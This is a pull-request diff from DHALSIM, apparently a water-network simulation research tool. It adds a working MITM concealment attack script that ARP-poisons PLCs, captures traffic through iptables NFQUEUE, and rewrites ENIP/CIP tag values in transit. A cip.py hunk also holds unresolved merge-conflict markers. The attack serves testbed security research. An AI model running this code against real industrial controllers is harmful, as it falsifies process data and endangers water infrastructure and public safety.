Merge pull request #19 from afmurillo/dev

Merging major changes into Dev

Author: afmurillo

dhalsim/epynet/network.py

@@ -101,22 +101,11 @@ def __run(self):
         curr_time = 0
         timestep = 1
 
-        #progress_bar = tqdm(total=self.ep.ENgettimeparam(0))
-        # timestep becomes 0 the last hydraulic step
         while timestep > 0:
             timestep, state = self.simulate_step(curr_time=curr_time, actuators_status=actuators_update_dict)
             curr_time += timestep
-
-            # in DHALSIM here there should be:
-            # update_state(state)
-
-            # TODO: remember to comment in DHALSIM
-            # if timestep != 0 and self.interactive:
-            #    self.update_actuators_status()
             sleep(0.01)
-            #progress_bar.update(timestep)
 
-        #progress_bar.close()
         self.ep.ENcloseH()
         self.solved = True
         self.create_df_reports()
@@ -138,9 +127,6 @@ def simulate_step(self, curr_time, actuators_status=None):
         :param curr_time: current simulation time
         :return: time until the next event, if 0 the simulation is going to end
         """
-
-        # update the status of actuators after the first step
-        # TODO: DHALSIM works with the status update here
         if actuators_status and self.interactive:
                 self.update_actuators_status(actuators_status)
 

dhalsim/network_attacks/concealment_mitm.py

@@ -0,0 +1,248 @@
+import argparse
+import os
+import time
+import traceback
+from pathlib import Path
+import threading
+
+from dhalsim.network_attacks.enip_cip_parser import cip
+
+from netfilterqueue import NetfilterQueue
+from scapy.layers.inet import IP, TCP
+from scapy.packet import Raw
+
+from dhalsim.network_attacks.utilities import launch_arp_poison, restore_arp, \
+    translate_payload_to_float, translate_float_to_payload, get_mac, spoof_arp_cache
+from dhalsim.network_attacks.synced_attack import SyncedAttack
+
+nfqueue = NetfilterQueue()
+
+
+import _thread
+
+class Error(Exception):
+    """Base class for exceptions in this module."""
+
+
+class DirectionError(Error):
+    """Raised when the optional parameter direction does not have source or destination as value"""
+
+class ConcealmentAttack(SyncedAttack):
+    """
+    This is a Naive Man In The Middle attack. This  attack will modify
+    the data that is passed around in tcp packets on the network, in order to
+    change the values of tags before they reach the requesting PLC.
+
+    It does this by capturing the responses of the the target plc, and changing
+    some bytes in the TCP packet so that the value is a different value.
+
+    When preforming this attack, you can use either an offset, or an absolute value.
+
+    When using this type of attack, all the responses of the PLC are modified.
+    You cannot modify the values of individual tags.
+
+    :param intermediate_yaml_path: The path to the intermediate YAML file
+    :param yaml_index: The index of the attack in the intermediate YAML
+    """
+
+    ARP_POISON_PERIOD = 15
+    """Period in seconds of arp poison"""
+
+
+    def __init__(self, intermediate_yaml_path: Path, yaml_index: int):
+        super().__init__(intermediate_yaml_path, yaml_index)
+        os.system('sysctl net.ipv4.ip_forward=1')
+        self.queue = None
+        self.q = None
+        self.thread = None
+        self.run_thread = False
+        self.attacked_tag = self.intermediate_attack['tag']
+
+        # The session id is used to pair CIP requests (with the tag name), with their responses (with the tag value)
+        self.session_id = 0
+
+    def setup(self):
+        """
+        This function start the network attack.
+
+        It first sets up the iptables on the attacker node to capture the tcp packets coming from
+        the target PLC. It also drops the icmp packets, to avoid network packets skipping the
+        attacker node.
+
+        Afterwards it launches the ARP poison, which basically tells the network that the attacker
+        is the PLC, and it tells the PLC that the attacker is the router.
+
+        Finally, it launches the thread that will examine all captured packets.
+        """
+        #os.system(f'iptables -t mangle -A FORWARD -p tcp -d {self.target_plc_ip} -j NFQUEUE --queue-num 1')
+        os.system(f'iptables -t mangle -A FORWARD -p tcp -j NFQUEUE --queue-num 1')
+
+
+        os.system('iptables -A FORWARD -p icmp -j DROP')
+        os.system('iptables -A INPUT -p icmp -j DROP')
+        os.system('iptables -A OUTPUT -p icmp -j DROP')
+
+        self.logger.info(f"NFqueue Bound periodic ARP Poison between {self.target_plc_ip} and "
+                          f"{self.intermediate_attack['gateway_ip']}")
+        # Launch the ARP poison by sending the required ARP network packets
+        self.launch_mitm(get_macs=True)
+        self.logger.info(f"Configured ARP Poison between {self.target_plc_ip} and "
+                         f"{self.intermediate_attack['gateway_ip']}")
+
+        self.logger.debug('Tag being attacked: ' + str(self.attacked_tag))
+
+        nfqueue.bind(0, self.capture)
+        nfqueue.run(block=False)
+
+        # Refresh ARP poison
+        #_thread.start_new_thread(self.refresh_poison, (self.ARP_POISON_PERIOD, self.ARP_POISON_PERIOD))
+
+    def refresh_poison(self, period, delay):
+        time.sleep(delay)
+        while self.run_thread:
+            self.launch_mitm(get_macs=False)
+            time.sleep(period)
+
+    def launch_mitm(self, get_macs=False):
+        if self.intermediate_yaml['network_topology_type'] == "simple":
+            for plc in self.intermediate_yaml['plcs']:
+                if plc['name'] != self.intermediate_plc['name']:
+
+                    if get_macs:
+                        self.mac_target_source = get_mac(self.target_plc_ip)
+                        self.mac_target_destination = get_mac(plc['local_ip'])
+
+                    spoof_arp_cache(self.target_plc_ip, self.mac_target_source, plc['local_ip'])
+                    spoof_arp_cache(plc['local_ip'], self.mac_target_destination, self.target_plc_ip)
+
+        else:
+            if get_macs:
+                self.mac_target_source = get_mac(self.target_plc_ip)
+                self.mac_target_destination = get_mac(self.intermediate_attack['gateway_ip'])
+
+            spoof_arp_cache(self.target_plc_ip, self.mac_target_source, self.intermediate_attack['gateway_ip'])
+            spoof_arp_cache(self.intermediate_attack['gateway_ip'], self.mac_target_destination, self.target_plc_ip)
+
+        self.logger.info(f"ARP Poison between {self.target_plc_ip} and "
+                          f"{self.intermediate_attack['gateway_ip']}")
+
+    def capture(self, packet):
+        """
+        This function is the function that will run in the thread started in the setup function.
+
+        For every packet that enters the netfilterqueue, it will check its length. If the length is
+        in between 100 and 116, we are dealing with a CIP packet. We then change the payload of that
+        packet and delete the original checksum.
+        """
+        while self.run_thread:
+            try:
+                p = IP(packet.payload)
+                #self.logger.debug('packet')
+                #self.logger.debug(p.show())
+                if 'ENIP_SendRRData' in p:
+                    # This type of packet carries the tag name
+                    #self.logger.debug('ENIP_SendRRData')
+                    #self.logger.debug(p.show())
+                    if 'CIP_ReqConnectionManager' in p:
+                        tag_name = p[Raw].load.decode(encoding='latin-1').split(':')[0][8:]
+                        self.logger.debug('ENIP TCP Session ID: ' + str(p['ENIP_TCP'].session))
+                        self.logger.debug('Received tag: ' + tag_name)
+
+                        if self.attacked_tag == tag_name:
+                            self.logger.debug('Modifying tag: ' + str(tag_name))
+                            self.session_id = p['ENIP_TCP'].session
+
+                    else:
+                        this_session = p['ENIP_TCP'].session
+                        if self.session_id == this_session:
+                            value = translate_payload_to_float(p[Raw].load)
+                            self.logger.debug('tag value is:' + str(value))
+                            self.logger.debug('Tag ' + self.attacked_tag + ' is going to be modified')
+
+                            if 'value' in self.intermediate_attack.keys():
+                                p[Raw].load = translate_float_to_payload(
+                                    self.intermediate_attack['value'], p[Raw].load)
+                            elif 'offset' in self.intermediate_attack.keys():
+                                self.logger.debug('Offsetting value')
+                                p[Raw].load = translate_float_to_payload(
+                                    translate_payload_to_float(p[Raw].load) + self.intermediate_attack[
+                                        'offset'], p[Raw].load)
+
+                            self.logger.debug\
+                                ('New payload tag value is: ' + str(translate_payload_to_float(p[Raw].load)))
+
+                            del p[TCP].chksum
+                            del p[IP].chksum
+
+                            packet.set_payload(bytes(p))
+                            self.logger.debug(f"Value of network packet for {p[IP].dst} overwritten.")
+
+                packet.accept()
+            except Exception as exc:
+                print("Exception in a MITM attack!:", exc)
+                print(traceback.format_exc())
+
+    def interrupt(self):
+        """
+        This function will be called when we want to stop the attacker. It calls the teardown
+        function if the attacker is in state 1 (running)
+        """
+        if self.state == 1:
+            self.teardown()
+
+    def teardown(self):
+        """
+        This function will undo the actions done by the setup function.
+
+        It first restores the arp poison, to point to the original router and PLC again. Afterwards
+        it will delete the iptable rules and stop the thread.
+        """
+        restore_arp(self.target_plc_ip, self.intermediate_attack['gateway_ip'])
+        if self.intermediate_yaml['network_topology_type'] == "simple":
+            for plc in self.intermediate_yaml['plcs']:
+                if plc['name'] != self.intermediate_plc['name']:
+                    restore_arp(self.target_plc_ip, plc['local_ip'])
+
+        self.logger.debug(f"Naive MITM Attack ARP Restore between {self.target_plc_ip} and "
+                          f"{self.intermediate_attack['gateway_ip']}")
+
+        os.system(
+            f'iptables -t mangle -D FORWARD -p tcp -j NFQUEUE --queue-num 1')
+
+        os.system('iptables -D FORWARD -p icmp -j DROP')
+        os.system('iptables -D INPUT -p icmp -j DROP')
+        os.system('iptables -D OUTPUT -p icmp -j DROP')
+
+        self.run_thread = False
+        time.sleep(0.5)
+        nfqueue.unbind()
+        #self.thread.join()
+
+    def attack_step(self):
+        """This function just passes, as there is no required action in an attack step."""
+        pass
+
+
+def is_valid_file(parser_instance, arg):
+    """Verifies whether the intermediate yaml path is valid."""
+    if not os.path.exists(arg):
+        parser_instance.error(arg + " does not exist")
+    else:
+        return arg
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Start everything for an attack')
+    parser.add_argument(dest="intermediate_yaml",
+                        help="intermediate yaml file", metavar="FILE",
+                        type=lambda x: is_valid_file(parser, x))
+    parser.add_argument(dest="index", help="Index of the network attack in intermediate yaml",
+                        type=int,
+                        metavar="N")
+
+    args = parser.parse_args()
+
+    attack = ConcealmentAttack(
+        intermediate_yaml_path=Path(args.intermediate_yaml),
+        yaml_index=args.index)
+    attack.main_loop()

dhalsim/network_attacks/enip_cip_parser/cip.py

@@ -125,8 +125,11 @@ class CIP_ReqGetAttributeList(scapy_all.Packet):
 
 class CIP_ReqReadOtherTag(scapy_all.Packet):
     """Optional information to be sent with a Read_Tag_Service
+<<<<<<< HEAD
 
     FIXME: this packet has been built from experiments, not from official doc
+=======
+>>>>>>> dev-concealment
     """
     fields_desc = [
         scapy_all.LEShortField("start", 0),
@@ -512,7 +515,6 @@ class CIP_MultipleServicePacket(scapy_all.Packet):
         LEShortLenField("count", None, count_of="packets"),
         scapy_all.FieldListField("offsets", [], scapy_all.LEShortField("", 0),
                                  count_from=lambda pkt: pkt.count),
-        # Assume the offsets are increasing, and no padding. FIXME: remove this assumption
         _CIPMSPPacketList("packets", [], CIP)
     ]
 
@@ -566,7 +568,6 @@ def post_build(self, p, pay):
 scapy_all.bind_layers(CIP, CIP_ReqForwardOpen, direction=0, service=0x54)
 scapy_all.bind_layers(CIP, CIP_RespForwardOpen, direction=1, service=0x54)
 
-# TODO: this is much imprecise :(
 # Need class in path to be 6 (Connection Manager)
 scapy_all.bind_layers(CIP, CIP_ReqConnectionManager, direction=0, service=0x52)